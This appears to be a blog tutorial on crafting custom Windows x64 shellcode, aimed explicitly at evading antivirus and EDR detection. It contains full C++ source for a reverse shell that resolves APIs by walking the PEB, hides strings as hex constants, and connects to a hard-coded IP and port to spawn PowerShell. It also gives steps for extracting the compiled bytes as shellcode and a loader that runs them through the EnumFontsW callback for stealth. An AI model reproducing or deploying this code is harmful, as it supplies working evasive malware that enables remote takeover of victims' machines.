How To Craft Your Own Windows x86/64 Shellcode with Visual Studio

Demonstrating how you could craft & launch a customized shellcode to target Windows x86/64 artefacts.

Posted by Yazid on July 23, 2023

\x62\x6F\x75\x68\x21

Many Antivirus and EDR products now incorporate methods and patterns for detecting shellcodes generated by well-known tools such as msfvenom (Metasploit's payload generator) or Sliver (C2). Although these tools are very powerful, they suffer from their notoriety and make a red teaming operation a real nightmare in terms of bypassing protections. Even if it is possible to obfuscate/encrypt a shellcode in the loader or to load it block by block, as well as other tricks, with some C++ skills it will be much more useful to know how to craft your own shellcode, as you will be able to customize it according to your needs and you will have an infinite range of capabilities that you can implement.

We're going to create a malicious payload, such as a reverse shell, which we'll then convert into x64 shellcode. The payload/shellcode we'll be designing here is stageless because it is, after all, only a proof of concept, but you could easily improve it & implement a staged payload using methods such as reflective DLL loading.
We're also going to design a payload that's independent of any pre-imports, and which itself retrieves the functions it needs and loads the necessary DLLs.

As a bonus, we'll see how to execute the shellcode from functions that at first glance seem totally legitimate, such as EnumFontsW, which initially aim to enumerate Windows fonts πŸ™‰.



Starting from the PEB

The PEB (Process Environment Block) is a user-mode structure that gathers certain information about the process to which it belongs, and is contained in the EPROCESS kernel structure. The EPROCESS structure contains structures that can only be accessed in kernel mode, except for the PEB, whose information can be accessed in user mode.

The program we're about to design will contain only one thread: the main thread, which will have its own TIB (Thread Information Block) structure, also known as TEB (Thread Environment Block). This structure contains, among other things, references to special memory segments GS and FS. These segments can then be used to locate certain sections of the TIB/TEB, including the PEB.
Note that the FS segment is used for 32-bit systems, and the GS segment for 64-bit systems.

Here is a list of all TIB/TEB internal structures, data and their associated FS/GS segments. We need to locate the PEB as it is the starting point of our malicious payload, and we'll need it later to retrieve everything the payload will need.
You could see that the associated GS segment that points to the PEB address is 0x60, this offset points to the linear address of the PEB.

We'll use the intrinsic function __readgsqword to read the value of that offset from the GS segment.
We'll cast that value which is a pointer to the PPEB that represents a pointer to the PEB structure.


PPEB peb = (PPEB)__readgsqword(0x60);                                
                                

Retrieving the Loader Data Table (LDR) content

We will then retrieve from the PEB a pointer to the PEB_LDR_DATA structure.

typedef struct _PEB_LDR_DATA
{
     ULONG Length;
     UCHAR Initialized; 
     PVOID SsHandle;
     LIST_ENTRY InLoadOrderModuleList;
     LIST_ENTRY InMemoryOrderModuleList;
     LIST_ENTRY InInitializationOrderModuleList;
     PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;


typedef struct _LIST_ENTRY
{
     PLIST_ENTRY Flink;
     PLIST_ENTRY Blink;
} LIST_ENTRY, *PLIST_ENTRY;

This structure contains LIST_ENTRY structures, we're interested in InMemoryOrderModuleList, which is a doubly-linked list where each element represents a module loaded by the process following its load order. The first element represents the process module, the following second element is NTDLL, and the third one is KERNEL32. Our payload will only need these last two modules to do the rest, i.e. loading the libraries it will require such as WS2_32.dll or User32.dll, and dynamic-link the functions it will need.

We could retrieve and print the content of the InMemoryOrderModuleList structure by traversing the linked list, making sure to stop when two identical flinks collide. :

PPEB_LDR_DATA peb_ldr_data = (PPEB_LDR_DATA)peb->Ldr;

PLIST_ENTRY first_list_entry = (PLIST_ENTRY)&(peb_ldr_data->InMemoryOrderModuleList);
	
PLIST_ENTRY list_entry = first_list_entry->Flink;

while (list_entry->Flink != first_list_entry->Flink) {
	PLDR_DATA_TABLE_ENTRY pldr_data_table_entry = (PLDR_DATA_TABLE_ENTRY)list_entry;
	wcout << pldr_data_table_entry->FullDllName.Buffer << endl;
	list_entry = list_entry->Flink;
} 
Which give us the following output reprsenting the loaded modules following their in-memory load order :
 
ownshellcoding.exe
ntdll.dll
KERNEL32.DLL
KERNELBASE.dll
ucrtbase.dll
MSVCP140.dll
VCRUNTIME140.dll
VCRUNTIME140_1.dll
                            

Why are we doing this? Because we want to first parse the two essential functions through which we can do everything else. These two functions are GetProcAddress, which allows us to retrieve the address of a procedure from a module, and then LoadLibraryA, which enables us to load a module into the process's memory. Both of these functions are found in Kernel32.dll, and yes, believe me, we can build our malicious payload using only these two functions.

This is where the LDR structure comes into play. It will allow us to find the address of Kernel32.dll and exploit its internal structures as a PE (Portable Executable) format object.

Parsing the Kernel32 PE object

In the first step, we retrieve a pointer to the LDR_DATA_TABLE_ENTRY structure of our Kernel32.dll object which is the third in-memory loaded module as shown in the scheme above. Then, we declare a pointer to a structure of type IMAGE_DOS_HEADER so that we can subsequently parse the elements of the Kernel32 PE object.


PLDR_DATA_TABLE_ENTRY kernel32Entry = CONTAINING_RECORD(peb->Ldr->InMemoryOrderModuleList.Flink->Flink->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

PIMAGE_DOS_HEADER kernel32DosHeader = (PIMAGE_DOS_HEADER)kernel32Entry->DllBase;
PIMAGE_NT_HEADERS64 kernel32NtHeader = (PIMAGE_NT_HEADERS64)((BYTE*)kernel32DosHeader + kernel32DosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY kernel32ExportsTable = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32DosHeader + kernel32NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

DWORD* kernel32addressOfFunctions = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfFunctions);
DWORD* kernel32addressOfNames = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNames);
WORD* kernel32addressOfNameOrdinals = (WORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNameOrdinals);
    

We won't go into the details of the internal structures of a PE format object (assuming you have a basic understanding of its components). After obtaining the LDR_DATA_TABLE_ENTRY and IMAGE_DOS_HEADER pointers, we will navigate through the exports table of Kernel32.dll to find our first crucial function: GetProcAddres, which will then serve to locate LoadLibraryA.

However, let's not forget that in the end, we want to convert our program into shellcode and have certain data, such as the character string that will be used to locate and access the functions later, contained within the same binary code that we will generate. This implies that these data should not end up in another section of the executable, as it would prevent us from accessing them if we were to export our shellcode to another process. Declaring a char* to hold our data would result in such a situation. Remember, everything must remain localized within our .text section.
A simple way to overcome this issue is to declare uint64_t data types or structures of uint64_t that will contain our character strings in their hexadecimal form, with the only small constraint being that we need to do this in little-endian format!


//47 65 74 50 72 6F 63 41 -> GetProcA (first 8 bytes)
uint64_t GetProcA = 0x41636F7250746547;

struct {
    uint64_t t0, t1;
} text;
				
// User32.dll
// 75 73 65 72 33 32 2E 64 -> User32.d 
// 6C 6C -> ll
text.t0 = 0x642E323372657375; (first 8 bytes)
text.t1 = 0x0000000000006C6C; (last 2 bytes)

So, we can now step up our game and fetch the address of GetProcAddress, but first, we need to define its signature according to how it has been defined in the Windows API:


/*
FARPROC GetProcAddress(
    [in] HMODULE hModule,
    [in] LPCSTR  lpProcName
    );
*/

typedef FARPROC (*_GetProcAddress)(HMODULE, LPCSTR);

_GetProcAddress GetProcAddress = nullptr;

Let's go! Next, we will search for a function that starts with "GetProcA" in the exports table of Kernel32.dll and linking it dynamicly.


for (DWORD i = 0; i < kernel32ExportsTable->NumberOfNames; i++) {

    DWORD functionRVA = kernel32addressOfFunctions[i];
    const char* functionName = (const char*)((BYTE*)kernel32DosHeader + functionRVA);
    const char* exportedName = (const char*)((BYTE*)kernel32DosHeader + kernel32addressOfNames[i]);
    
    if (*(uint64_t *)((size_t)kernel32DosHeader + kernel32addressOfNames[i]) == GetProcA) {        
        
        GetProcAddress = (_GetProcAddress)(const void*)((size_t)kernel32DosHeader + kernel32addressOfFunctions[kernel32addressOfNameOrdinals[i]]);

Now that we have the GetProcAddress function at hand, we can use it to locate the rest of the addresses we need, including LoadLibraryA. LoadLibraryA will be used to load the necessary libraries for our reverse shell, namely User32.dll and Ws2_32.dll.

Here is the full source code of the malicious payload that establish a reverse shell to 172.19.192.197 on TCP port 2106 on a powershell handle :

    
#include <WinSock2.h>
#include <windows.h>
#include <winternl.h>
#include <cstdint>

__declspec(noinline) void customshellcode() {

    WSAData wsadata;
    struct sockaddr_in sock_addr;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HMODULE ntdll;
    HMODULE user32;
    HMODULE ws2_32;
    HMODULE kernel32;

    PPEB peb = (PPEB)__readgsqword(0x60); // gs 0x60 & fs 0x30

    PPEB_LDR_DATA peb_ldr_data = (PPEB_LDR_DATA)peb->Ldr;

    PLDR_DATA_TABLE_ENTRY ntdllEntry = CONTAINING_RECORD(peb->Ldr->InMemoryOrderModuleList.Flink->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

    PIMAGE_DOS_HEADER ntdllDosHeader = (PIMAGE_DOS_HEADER)ntdllEntry->DllBase;
    ntdll = (HMODULE)ntdllDosHeader;

    PLDR_DATA_TABLE_ENTRY kernel32Entry = CONTAINING_RECORD(peb->Ldr->InMemoryOrderModuleList.Flink->Flink->Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);

    PIMAGE_DOS_HEADER kernel32DosHeader = (PIMAGE_DOS_HEADER)kernel32Entry->DllBase;
    PIMAGE_NT_HEADERS64 kernel32NtHeader = (PIMAGE_NT_HEADERS64)((BYTE*)kernel32DosHeader + kernel32DosHeader->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY kernel32ExportsTable = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32DosHeader + kernel32NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    DWORD* kernel32addressOfFunctions = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfFunctions);
    DWORD* kernel32addressOfNames = (DWORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNames);
    WORD* kernel32addressOfNameOrdinals = (WORD*)((BYTE*)kernel32DosHeader + kernel32ExportsTable->AddressOfNameOrdinals);

    struct {
        uint64_t t0, t1;
    } text;

    // Ntdll
    typedef void (*_memset)(void*, int, size_t);

    // Uuser32
    typedef int (*_MessageBox)(HWND, LPCTSTR, LPCTSTR, UINT);

    // Winsock
    typedef int (*_WSAStartup)(WORD, LPWSADATA);
    typedef SOCKET(*_WSASocketA)(int, int, int, LPWSAPROTOCOL_INFOA, GROUP, DWORD);
    typedef int (*_WSAConnect)(SOCKET, const sockaddr*, int, LPWSABUF, LPWSABUF, LPQOS, LPQOS);
    typedef int (*_send)(SOCKET, const char, int, int);
    typedef int (*_recv)(SOCKET, char, int, int);
    typedef u_short(*_htons)(u_short);
    typedef unsigned long(*_inet_addr)(const char*);

    // Kernel32
    typedef FARPROC(*_GetProcAddress)(HMODULE, LPCSTR);
    typedef HMODULE(*_LoadLibraryA)(LPCSTR);
    typedef BOOL(*_CreateProcessA)(LPCSTR, LPCSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);

    _GetProcAddress GetProcAddress = nullptr;
    _LoadLibraryA LoadLibraryA = nullptr;
    _MessageBox MessageBox = nullptr;
    _WSAStartup WSAStartup = nullptr;
    _WSASocketA WSASocketA = nullptr;
    _WSAConnect WSAConnect = nullptr;
    _send send = nullptr;
    _recv recv = nullptr;
    _memset memset = nullptr;
    _htons htons = nullptr;
    _inet_addr inet_addr = nullptr;
    _CreateProcessA CreateProcessA = nullptr;

    for (DWORD i = 0; i < kernel32ExportsTable->NumberOfNames; i++) {

        DWORD functionRVA = kernel32addressOfFunctions[i];
        const char* functionName = (const char*)((BYTE*)kernel32DosHeader + functionRVA);
        const char* exportedName = (const char*)((BYTE*)kernel32DosHeader + kernel32addressOfNames[i]);

        // GetProcAddress
        // 47 65 74 50 72 6F 63 41
        // 64 64 72 65 73 73
        uint64_t GetProcA = 0x41636F7250746547;
        if (*(uint64_t*)((size_t)kernel32DosHeader + kernel32addressOfNames[i]) == GetProcA) {

            GetProcAddress = (_GetProcAddress)(const void*)((size_t)kernel32DosHeader + kernel32addressOfFunctions[kernel32addressOfNameOrdinals[i]]);

            // LoadLibraryA
            // 4C 6F 61 64 4C 69 62 72
            // 61 72 79 41
            text.t0 = 0x7262694C64616F4C;
            text.t1 = 0x0000000041797261;

            kernel32 = (HMODULE)kernel32DosHeader;
            LoadLibraryA = (_LoadLibraryA)GetProcAddress(kernel32, (LPSTR)&text.t0);

            // User32.dll
            // 75 73 65 72 33 32 2E 64 
            // 6C 6C
            text.t0 = 0x642E323372657375;
            text.t1 = 0x0000000000006C6C;
            user32 = LoadLibraryA((const char*)&text.t0);

            // LoadLibraryA 
            // 4D 65 73 73 61 67 65 42 
            // 6F 78 41
            text.t0 = 0x426567617373654D;
            text.t1 = 0x000000000041786F;
            MessageBox = (_MessageBox)GetProcAddress(user32, (LPSTR)&text.t0);

            // Ws2_32.dll
            // 57 73 32 5F 33 32 2E 64
            // 6C 6C
            text.t0 = 0x642E32335F327357;
            text.t1 = 0x0000000000006C6C;
            ws2_32 = LoadLibraryA((const char*)&text.t0);

            // WSAStartup
            // 57 53 41 53 74 61 72 74 
            // 75 70
            text.t0 = 0x7472617453415357;
            text.t1 = 0x0000000000007075;
            WSAStartup = (_WSAStartup)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // WSASocketA
            // 57 53 41 53 6F 63 6B 65 
            // 74 41
            text.t0 = 0x656B636F53415357;
            text.t1 = 0x0000000000004174;
            WSASocketA = (_WSASocketA)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // WSAConnect
            // 57 53 41 43 6F 6E 6E 65 
            // 63 74
            text.t0 = 0x656E6E6F43415357;
            text.t1 = 0x0000000000007463;
            WSAConnect = (_WSAConnect)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // memset 
            // 6D 65 6D 73 65 74
            text.t0 = 0x00007465736D656D;
            text.t1 = 0x0000000000000000;
            memset = (_memset)GetProcAddress((HMODULE)ntdll, (const char*)&text.t0);

            // send
            // 73 65 6E 64
            text.t0 = 0x00000000646E6573;
            send = (_send)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // recv
            // 72 65 63 76
            text.t0 = 0x0000000076636572;
            recv = (_recv)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // htons
            // 68 74 6F 6E 73
            text.t0 = 0x000000736E6F7468;
            htons = (_htons)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // inet_addr
            // 69 6E 65 74 5F 61 64 64 
            // 72
            text.t0 = 0x6464615F74656E69;
            text.t1 = 0x0000000000000072;
            inet_addr = (_inet_addr)GetProcAddress((HMODULE)ws2_32, (const char*)&text.t0);

            // CreateProcessA
            // 43 72 65 61 74 65 50 72 
            // 6F 63 65 73 73 41
            text.t0 = 0x7250657461657243;
            text.t1 = 0x000041737365636F;
            CreateProcessA = (_CreateProcessA)GetProcAddress((HMODULE)kernel32, (const char*)&text.t0);

            break;
        }
    }

    // Reverse shell inspired by https://cocomelonc.github.io/tutorial/2021/09/15/simple-rev-c-1.html by @cocomelonc

    int init = WSAStartup(MAKEWORD(2, 2), &wsadata);
    SOCKET sock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    // 2106
    // 08 3A
    text.t0 = 0x83A;
    text.t1 = 0x0000000000000000;

    short port = static_cast(text.t0);
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons(port);

    // 172.19.192.197
    // 31 37 32 2E 31 39 2E 31 
    // 39 32 2E 31 39 37
    text.t0 = 0x312E39312E323731;
    text.t1 = 0x00003739312E3239;

    sock_addr.sin_addr.s_addr = inet_addr((const char*)&text.t0);

    int conn = WSAConnect(sock, (SOCKADDR*)&sock_addr, sizeof(sock_addr), NULL, NULL, NULL, NULL);
    memset(&si, 0, sizeof(si));

    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdInput = si.hStdOutput = (HANDLE)sock;

    // powershell.exe
    // 70 6F 77 65 72 73 68 65  
    // 6C 6C 2E 65 78 65
    text.t0 = 0x6568737265776F70;
    text.t1 = 0x00006578652E6C6C;

    CreateProcessA(NULL, (const char*)&text.t0, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA)&si, &pi);
}

int main() {

    customshellcode();
    return 0;
}
    

We can confirm that we have successfully opened a reverse shell to the remote machine. Now, it's time to turn all of this into shellcode!

Payload conversion to shellcode

First, make sure that we are in release mode and choose the build target (x64 or x32).

Do not be in Debug mode, as Visual Studio may add certain symbols and background instructions that will alter the uniformity of the assembly code and its independence.

Next, ensure that you disable the /GS option in the compilation settings. This option adds security cookies to the binary code, which could also affect the independence of the shellcode.

Then, set a breakpoint on the function that contains your payload. In my case, it is named custom_shellcode().

Then launch the program with the Visual Studio local debugger. The program execution will stop at the breakpoint you have set. Now, press Ctrl+Alt+D to open the disassembly view of your code.

To facilitate what we will do next, make sure to select the display of code bytes.

Afterward, copy the assembly code from your function to a text editor and apply a set of regular expressions to format the shellcode. The set of regular expression for search and replace is as follows:

// 1. Replace with nothing, as it removes the mnemonic & the instructions following it
Regex: \b(?:mov|movsxd|ret|cmp|lea|call|inc|jmp|movzx|push|nop|ret|xor|sub|pop|jb|add|je|test)\b.*$ 

// 2. Remove all the spaces by simpling searching for a space character in the search base and replacing it with nothing.

// 3. Shellcode wrapping by searching for (.{30}) and replacing it with $1\n

// 4. Shellcode formating by adding the '\x's & quotes, done by searching for (.{2}) and replacing with \x$1, then searching for (^|$) and replacing it with "

Here's the result :

Magnificent! Now that we have our shellcode, we can copy it to a program that will be responsible for executing it. To do this, we will launch our shellcode from a routine that is not intended for this purpose which is EnumFontsW.

Using the EnumFontsW routine to launch our shellcode adds an element of stealth to our execution process. Since EnumFontsW is a legitimate function for enumerating available fonts in Windows, it may not raise suspicion to antivirus or Endpoint Detection and Response (EDR) systems, making it a good choice for executing our shellcode without drawing unwanted attention. This technique is commonly used in various forms of code injection and shellcode execution to bypass security measures.

Here is the complete program used to launch the shellcode:


#include <iostream>
#include <stdint.h>

#define WIN32_LEAN_AND_MEAN
#include <windows.h>

#pragma warning (push, 0)
#include <winternl.h>
#include <cstdint>

// Paste your shellcode there
unsigned char sc[] =
"\x48\x89\x5C\x24\x20\x55\x56\x57\...."; 

int main() {        
    LPVOID scBaseAddr = VirtualAlloc(NULL, sizeof(sc), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(scBaseAddr, sc, sizeof(sc));

    HDC dc = GetDC(NULL);
    EnumFontsW(dc, NULL, (FONTENUMPROCW)scBaseAddr, NULL);

    return 0;
}

Boouum ! Shellcode executed successfully !!πŸ˜ΊπŸ΄β€β˜ οΈ

References :

I'm still learning so if you have a comment or observation on this article, feel free to contact me, my email addresses are on my Github profile 😸